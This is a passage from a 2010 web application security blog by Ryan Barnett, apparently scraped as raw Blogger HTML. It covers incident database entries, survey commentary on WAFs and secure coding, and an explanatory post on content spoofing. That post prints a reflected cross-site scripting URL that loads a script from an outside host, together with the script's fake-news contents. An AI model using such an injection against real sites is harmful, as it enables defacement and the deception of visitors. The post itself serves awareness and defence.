is that someone hacked into some banks in Germany and Switzerland and stole account data about customers. Many of the banks are used as havens for people to hide their money for tax evasion purposes. The banks identified that this happened and did not notify their customers that their data was stolen. Well, the attacker decided to sell the stolen account data to the German government who then used the data to track down the account holders who were hiding money. The German government is now seeking back taxes and penalties against the account holders. The final piece of the story that is interesting is that one account holder ended up suing (and won by the way) the Bank for not notifying him about the stolen data with the rationale being that if he had known then he could have come forward to the German government and avoided additional penalties during the grace period.</span></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></p> <p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">All I can say is WOW. All four players in this story (the account holder, the bank, the attacker and the German government) *all* have dirty hands... It will be interesting to see what plays out in the future and if other Governments adopt a similar philosophy of paying for stolen data.</span></span></p> <p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span style=" font-weight:600;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Entry Title: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><span class="blsp-spelling-error" id="SPELLING_ERROR_4">WHID</span> 2010-64: Taxman rakes in hundreds of millions thanks to stolen bank data</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><span class="blsp-spelling-error" id="SPELLING_ERROR_5">WHID</span> ID:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> 2010-64</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Date <span class="blsp-spelling-corrected" id="SPELLING_ERROR_6">Occurred</span>:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> April 7, 2010</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attack Method:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> Unknown</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Outcome: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Monetary Loss</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Incident Description: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">A fascinating story about how the German government has decided to buy stolen bank data in order to go after German citizens who have not paid taxes on their hidden accounts. </span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">An interesting twist in another case involving <span class="blsp-spelling-error" id="SPELLING_ERROR_7">LGT</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_8">Treuhand</span>, a Bad Homburg business man won millions in damages in a suit against the bank for failing to reveal that his information was stolen along with hundreds of other account holders and sold to German authorities for a criminal investigation. He argued that if the bank had informed those on the list that their data had been sold, they could have turned themselves in, receiving temporary amnesty and much lower fines.</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attack Source Geography: </span></span></b></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attacked Entity Field: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Finance</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attacked Entity Geography:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> Germany</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Reference: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><a href="http://www.thelocal.de/article.php?ID=26381">http://www.thelocal.de/article.php?ID=26381</a></span></span><!--EndFragment--></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><br /></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><b>Update</b> - Apparently, the attacker in this case was a former employee and stole the account data by burning them to CDs.</span></p></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com2tag:blogger.com,1999:blog-5361523904237597206.post-41956278492608555822010-04-07T08:43:00.007-04:002010-04-08T12:41:08.127-04:00WAF Confusion Continues<span style="font-style:italic;"><span class="Apple-style-span" style="font-size: small;">By Ryan Barnett 04/07/2010</span></span><span class="Apple-style-span" style="font-size: small;"><br /><br /></span><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Frost&Sullivan recently held an Analyst briefing entitled "</span><a href="http://www.frostandsullivan.com/prod/servlet/analyst-briefing-detail.pag?mode=open&sid=192378074"><span class="Apple-style-span" style="font-size: small;">Analyst Briefing: Web Application Firewall: A Critical Defense For an Information Centric World</span></a><span class="Apple-style-span" style="font-size: small;">" in which they provided an overview of the </span><span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> market in the Asia Pacific region. </span><a href="http://www.slideshare.net/FrostandSullivan/web-application-firewall-waf-a-critical-defence-for-an-informationcentric-world"><span class="Apple-style-span" style="font-size: small;">Slides 5 and 6 of the presentation</span></a><span class="Apple-style-span" style="font-size: small;"> showed that there are still misconceptions about </span><span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> where organizations don't fully understand what they are and when they need them. There were two questions asked in the survey about </span><span class="blsp-spelling-error" id="SPELLING_ERROR_2"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> understanding.</span></span></div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yBOv0GXiI/AAAAAAAAAGw/TRi2SxR86q8/s1600/waf_confusion_1.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 221px;" src="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yBOv0GXiI/AAAAAAAAAGw/TRi2SxR86q8/s320/waf_confusion_1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5457378938819337762" /></a><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The first question was </span><b><i><span class="Apple-style-span" style="font-size: small;">"What is the first function that comes to mind when I mention the term "Web Application Firewall?"</span></i></b><span class="Apple-style-span" style="font-size: small;"> The top 6 responses are shown in the graphic on the right. As you can see, the two most telling responses were that 19.3% of respondents thought about Network Security. I attribute this response to two main factors:</span></span></div><div><ol><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">A lack of understanding of the threat. Many organization don't understand that professional criminals' #1 targets are web applications.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">An unfortunate side-effect of the name </span><span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;">. Having the term "firewall" in the name understandably leads people to think of network security devices.</span></span></li></ol></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The other interesting response was that 13% thought about IDS/</span><span class="blsp-spelling-error" id="SPELLING_ERROR_4"><span class="Apple-style-span" style="font-size: small;">IPS</span></span><span class="Apple-style-span" style="font-size: small;">. This also leads to two thoughts:</span></span></div><div><ol><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Many people are using a </span><span class="blsp-spelling-error" id="SPELLING_ERROR_5"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> as only an HTTP-Aware IDS/</span><span class="blsp-spelling-error" id="SPELLING_ERROR_6"><span class="Apple-style-span" style="font-size: small;">IPS</span></span><span class="Apple-style-span" style="font-size: small;"> and utilizing only a negative security model.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Some of these respondents may not know that a </span><span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> has other protection mechanisms beyond typical IDS/</span><span class="blsp-spelling-error" id="SPELLING_ERROR_8"><span class="Apple-style-span" style="font-size: small;">IPS</span></span><span class="Apple-style-span" style="font-size: small;"> capabilities. Items such as positive security, automated learning and session based protections are what really differentiates </span><span class="blsp-spelling-error" id="SPELLING_ERROR_9"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> from other security devices.</span></span></li></ol></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The second question in the survey was "Agreement Towards Statements Concerning Web Application Firewalls." They asked 6 questions and the responses to two of them again shows a lack of understanding of when/how </span><span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> can help.</span></span></div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yNAKnQRBI/AAAAAAAAAG4/dmeqbv_P0-A/s1600/waf_confusion_2.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 220px;" src="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yNAKnQRBI/AAAAAAAAAG4/dmeqbv_P0-A/s320/waf_confusion_2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5457391882454713362" /></a><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><b><i><span class="Apple-style-span" style="font-size: small;">Having a powerful network firewall is sufficient to make up for a lack of a </span><span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="Apple-style-span" style="font-size: small;">WAF</span></span></i></b></span><span class="Apple-style-span" style="font-size: small;"><br /></span><span class="Apple-style-span" style="font-family:arial;"><blockquote></blockquote><blockquote></blockquote><span class="Apple-style-span" style="font-size: small;">55% of respondents agreed with this statement. I believe that this viewpoint is somewhat related to the previous responses about a </span><span class="blsp-spelling-error" id="SPELLING_ERROR_12"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> being an HTTP-Aware IDS/</span><span class="blsp-spelling-error" id="SPELLING_ERROR_13"><span class="Apple-style-span" style="font-size: small;">IPS</span></span><span class="Apple-style-span" style="font-size: small;">. Network Firewall vendors are promoting the concept of Deep Packet Inspection capabilities which allows them to view application layer data however there are some real-world limitations that often crop up with regards to web traffic.</span></span></div><div><ul><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Access to </span><span class="blsp-spelling-error" id="SPELLING_ERROR_14"><span class="Apple-style-span" style="font-size: small;">SSL</span></span><span class="Apple-style-span" style="font-size: small;"> traffic - in order to decrypt the </span><span class="blsp-spelling-error" id="SPELLING_ERROR_15"><span class="Apple-style-span" style="font-size: small;">SSL</span></span><span class="Apple-style-span" style="font-size: small;"> streams to view the HTTP payloads, any security device must be able to import the </span><span class="blsp-spelling-error" id="SPELLING_ERROR_16"><span class="Apple-style-span" style="font-size: small;">SSL</span></span><span class="Apple-style-span" style="font-size: small;"> cert and private key of the destination app server. Many network firewalls do not have the capability so the web-based protection is only for clear-text port 80 traffic.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Only negative security/signatures - the protections are based only on known/public vulnerabilities and use signatures.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Performance impact - network firewalls have to service many other protocols and the performance overhead of Deep Packet Inspection usually adds too much latency for real-world use.</span></span></li></ul><div><span class="Apple-style-span" style="font-family:arial;"><b><i><span class="blsp-spelling-error" id="SPELLING_ERROR_17"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> is only required if a company wants to be </span><span class="blsp-spelling-error" id="SPELLING_ERROR_18"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;">-</span><span class="blsp-spelling-error" id="SPELLING_ERROR_19"><span class="Apple-style-span" style="font-size: small;">DSS</span></span><span class="Apple-style-span" style="font-size: small;"> compliant</span></i></b></span></div></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">48.3% of respondents agreed with this comment which to me implies two things:</span></span></div><div><ol><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Organizations don't understand the true value of </span><span class="blsp-spelling-error" id="SPELLING_ERROR_20"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> which extend beyond the "Signature-Based, HTTP-Aware IDS/</span><span class="blsp-spelling-error" id="SPELLING_ERROR_21"><span class="Apple-style-span" style="font-size: small;">IPS</span></span><span class="Apple-style-span" style="font-size: small;">". This narrow use case excludes capabilities such as Application Defect Identification and Performance Events (such as identifying Application Layer </span><span class="blsp-spelling-error" id="SPELLING_ERROR_22"><span class="Apple-style-span" style="font-size: small;">DoS</span></span><span class="Apple-style-span" style="font-size: small;">).</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">This view echoes the comments made by </span><span class="blsp-spelling-error" id="SPELLING_ERROR_23"><span class="Apple-style-span" style="font-size: small;">Ofer</span></span><span class="Apple-style-span" style="font-size: small;"> </span><span class="blsp-spelling-error" id="SPELLING_ERROR_24"><span class="Apple-style-span" style="font-size: small;">Shezaf</span></span><span class="Apple-style-span" style="font-size: small;"> in his </span><a href="http://www.xiom.com/2010/01/10/curse-pci-wafs"><span class="Apple-style-span" style="font-size: small;">"The Curse of </span><span class="blsp-spelling-error" id="SPELLING_ERROR_25"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;"> for </span><span class="blsp-spelling-error" id="SPELLING_ERROR_26"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;">"</span></a><span class="Apple-style-span" style="font-size: small;"> blog post. It seems like a bit of a Catch-22 with </span><span class="blsp-spelling-error" id="SPELLING_ERROR_27"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;"> and </span><span class="blsp-spelling-error" id="SPELLING_ERROR_28"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> in that on the one hand, </span><span class="blsp-spelling-error" id="SPELLING_ERROR_29"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;"> has raised the awareness of </span><span class="blsp-spelling-error" id="SPELLING_ERROR_30"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> in general, however on the other hand now people are starting to associate </span><span class="blsp-spelling-error" id="SPELLING_ERROR_31"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> as a need only if you have comply with </span><span class="blsp-spelling-error" id="SPELLING_ERROR_32"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;">.</span></span></li></ol><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The end result of this survey shows that there is still much </span><span class="blsp-spelling-error" id="SPELLING_ERROR_33"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> awareness and education that needs to be done in the marketplace. Hopefully my blog posts are helping in this regard.</span></span></div></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-38492185781038695082010-04-05T11:10:00.011-04:002010-04-08T12:41:37.417-04:00Secure Coding Practices Survey Results<i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Submitted by Ryan Barnett 04/06/2010</span></span></i><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">
<br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The results of an interesting survey was recently released by Errata Security entitled </span></span><a href="http://www.erratasec.com/ErrataSurveyResults.pdf"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="color:#000000;"><span class="Apple-style-span" style="font-size: small;">Integrating Security Into the Software Development Lifecycle</span></span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">. The survey was gathered during the recent RSA and Security B-Sides conferences in San Francisco and focused on attendees who worked at software companies. There were a number of interesting perspectives on the levels of success, or lack there or, of attempting to implement a software development life cycle (SDLC) into an organization. Here is the most telling takeway from a </span></span><a href="http://www.darkreading.com/shared/printableArticle.jhtml?articleID=224200945"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="color:#000000;"><span class="Apple-style-span" style="font-size: small;">DarkReading</span></span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"> story on the survey results: </span></span></div><meta equiv="content-type" content="text/html; charset=utf-8"><p></p><blockquote><p><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Microsoft's SDL was the most popular tool for secure software development methods, with Microsoft SDL Agile at number two, with 35 percent of the respondents using Agile SDL, most of which were small development firms and several large companies in the survey. "The survey showed a big win for Microsoft's awareness program, but what I hope that Microsoft will learn from this is that small- to medium-sized software companies have different needs than the big guys. SDL-Agile is a good start, but now they need to re-evaluate the resource requirements with small company in mind," says Marisa Fagan, security project manager at Errata Security.</span></span></i></p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_E0YEPhKPc2k/S7pDVHMMA5I/AAAAAAAAAGo/v6sPL-cKras/s1600/reasons_for_not_adopting.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 138px;" src="http://1.bp.blogspot.com/_E0YEPhKPc2k/S7pDVHMMA5I/AAAAAAAAAGo/v6sPL-cKras/s400/reasons_for_not_adopting.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5456747928499258258" /></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">
<br />
<br /></span></span><div><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Fagan says among those companies not deploying a secure coding program, the main reason was a lack of resources.</span></span><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"> "No matter what the size of the company, participants said it was too time consuming, too expensive, and too draining on their resources," she says</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">. "Another reason was that management had deemed it unnecessary...The survey showed that developers look to management to set the security agenda, and are generally not self-starters when it comes to including security in their code."</span></span></i><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"> </span></span></i></div></blockquote><div> </div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">This is a key finding that organizations are facing, especially small to medium sized ones. Here is a comment from a survey participant that echoes this same sentiment:</span></span></div><div><blockquote><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Planning to move security further "left" in the cycle. Unfortunately, my executive management is more concerned with getting a product out the door than getting a secure product out the door. Until that changes, I don't know how successful I can be...</span></span></i></blockquote></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">I have seen this issue first hand. If upper-management does not fully comprehend the impact of poor software security, then throwing process and technology at the problem won't help. C-level executives need guidelines so that they can make informed decisions about the possible consequences of producing insecure code. </span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Last Wednesday an interesting report was released called "</span><a href="http://webstore.ansi.org/cybersecurity.aspx"><span class="Apple-style-span" style="color:#000000;"><span class="Apple-style-span" style="font-size: small;">The Financial Management of Cyber Risk: An Implementation Framework for CFOs</span></span></a><span class="Apple-style-span" style="font-size: small;">" and it is highly recommended that management reads it. Please pass this along.</span></span></div><div> </div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-79048658461696642352010-04-05T10:13:00.002-04:002010-04-05T10:27:46.153-04:00Weekly Round-Up of Web Hacking Incident Database (WHID) Events (March 29th - April 5th)<div><i>Submitted by Ryan Barnett 04/05/2010</i></div><div><br /></div><div><div>The <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">Web Hacking Incidents Database</a>, or WHID for short, is a <a href="http://www.webappsec.org">Web Application Security Consortium</a> project dedicated to maintaining a list of web applications related security incidents. WHID goal is to serve as a tool for raising awareness of the web application security problem and provide information for statistical analysis of web applications security incidents.</div><div><br /></div><div>The following incidents where added to WHID last week:</div><div><br /></div><div>WHID 2010-46: Microsoft's Larry "Major Nelson" Hryb has online account hijacked through Xbox.com as part of underground group's publicity bid.</div><div><a href="http://www.gamespot.com/news/6254330.html">http://www.gamespot.com/news/6254330.html</a></div><div><br /></div><div>WHID 2010-47: Court papers: JC Penney was hacking victim</div><div><a href="http://www.msnbc.msn.com/id/36088614/ns/technology_and_science-security/">http://www.msnbc.msn.com/id/36088614/ns/technology_and_science-security/</a></div><div><br /></div><div>WHID 2010-48: Hackers brute force their way into galeton.com website containing names, credit card numbers</div><div><a href="http://datalossdb.org/incidents/2692-hackers-brute-force-their-way-into-website-containing-names-credit-card-numbers">http://datalossdb.org/incidents/2692-hackers-brute-force-their-way-into-website-containing-names-credit-card-numbers</a></div><div><br /></div><div>WHID 2010-49: Hackers pluck 8,300 customer logins from bank server</div><div><a href="http://www.theregister.co.uk/2010/01/12/bank_server_breached/">http://www.theregister.co.uk/2010/01/12/bank_server_breached/</a></div><div><br /></div><div>WHID 2010-50: Shared-password vulnerability may have exposed personal information in online account management system</div><div><a href="http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034">http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034</a></div><div><br /></div><div>WHID 2010-51: Woman worms into D.C. taxpayer accounts</div><div><a href="http://www.washingtonexaminer.com/local/Woman-worms-into-D_C_-taxpayer-accounts-83589257.html">http://www.washingtonexaminer.com/local/Woman-worms-into-D_C_-taxpayer-accounts-83589257.html</a></div><div><br /></div><div>WHID 2010-52: 3000 Small Dog Electronics customers' credit card details compromised</div><div><a href="http://www.infosecurity-us.com/view/7411/3000-small-dog-electronics-customers-credit-card-details-compromised/">http://www.infosecurity-us.com/view/7411/3000-small-dog-electronics-customers-credit-card-details-compromised/</a></div><div><br /></div><div>WHID 2010-53: Google says Vietnam political blogs hacked</div><div><a href="http://news.yahoo.com/s/afp/20100331/tc_afp/vietnammediainternetrightsgooglemcafee&a=Technology News&x=1">http://news.yahoo.com/s/afp/20100331/tc_afp/vietnammediainternetrightsgooglemcafee&a=Technology News&x=1</a></div><div><br /></div><div>WHID 2010-54: MyPilotStore.com hack results in false charges on customers’ cards</div><div><a href="http://www.databreaches.net/?p=10990">http://www.databreaches.net/?p=10990</a></div><div><br /></div><div>WHID 2010-55: Drudge Report accused of serving malware, again</div><div><a href="http://news.cnet.com/8301-27080_3-10466044-245.html">http://news.cnet.com/8301-27080_3-10466044-245.html</a></div><div><br /></div><div>WHID 2010-56: Facebook Flub Leaks Private E-Mail Addresses</div><div><a href="http://www.cio.com/article/589021/Facebook_Flub_Leaks_Private_E_Mail_Addresses">http://www.cio.com/article/589021/Facebook_Flub_Leaks_Private_E_Mail_Addresses</a></div><div><br /></div><div>WHID 2010-57: Web security under attack from ads in prominent advertising programs</div><div><a href="http://www.mxlogic.com/securitynews/web-security/web-security-under-attack-from-ads-in-prominent-advertising-programs651.cfm">http://www.mxlogic.com/securitynews/web-security/web-security-under-attack-from-ads-in-prominent-advertising-programs651.cfm</a></div><div><br /></div><div>WHID 2010-58: China journalist club shuts website after attack</div><div><a href="http://www.reuters.com/assets/print?aid=USTOE63101R20100402">http://www.reuters.com/assets/print?aid=USTOE63101R20100402</a></div></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-57118292850135925752010-04-01T09:46:00.004-04:002010-04-01T10:52:39.019-04:00Content Spoofing - Not Just An April Fool's Day Attack<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_E0YEPhKPc2k/S7SowmEHBgI/AAAAAAAAAGY/R_B9b2mkBl4/s1600/fake_news.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 263px;" src="http://4.bp.blogspot.com/_E0YEPhKPc2k/S7SowmEHBgI/AAAAAAAAAGY/R_B9b2mkBl4/s400/fake_news.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5455170601457485314" /></a><br /><i>Submitted by Ryan Barnett 04/01/2010</i><div><i><br /></i></div><div>Happy April Fool's Day Everyone! April 1st is traditionally a day for pranks and there is no doubt in my mind that we will all be flooded with all sorts of <a href="http://projects.webappsec.org/Content-Spoofing">Content Spoofing</a> types of fake news stories such as the one in the graphic on the right from the CBS News website whose headline read:</div><div><blockquote></blockquote><blockquote><b><i>George Bush appoints a 9 year old to be the chairperson of the Information Security Department.</i></b></blockquote></div><div>How are these attacks carried out? More often than not, attackers leverage reflective <a href="http://projects.webappsec.org/Cross-Site+Scripting">Cross-site Scripting</a> vulnerabilities within news outlet's web applications so that if victims click on web links the spoofed data will appear. Here is what the XSS link looked like:</div><i><blockquote>http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1<b>--%3E%3Cscript%20src=http://www.securitylab. ru/test/sc.js%3E%3C/script%3E%3C!--</b></blockquote></i><div>When the user sent this request to the website, the javascript payload executed within the victim's browser and requested the sc.js file on the remote, hacker-owned website. The contents of the sc.js file were:</div><i><blockquote>document.write('&ltp align=left&gtMon, 28 August 2006');<br />document.write('&ltp align=center>&ltb&gtGeorge Bush appoints a 9year old to be the chairperson… ');<br />document.write('&ltp>On Friday night, George Bush made... ');<br />document.write('&ltp>Michael Antipov was noticed by the FBI... ');<br />document.write('&ltp>Michael Antipov, sun of the top-secret... ');<br />document.write('&ltp>From now on the citizens of the USA can... ');</blockquote></i><div>Cross-site Scripting vulnerabilities are found in just about every web application so the CBS News site example here is not unique. The <a href="http://xssed.com/search?key=news"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">XSSed</span> website</a> shows a number of news outlet sites vulnerable to this type of attack:</div><div><span class="Apple-style-span" style="font-family: Verdana, 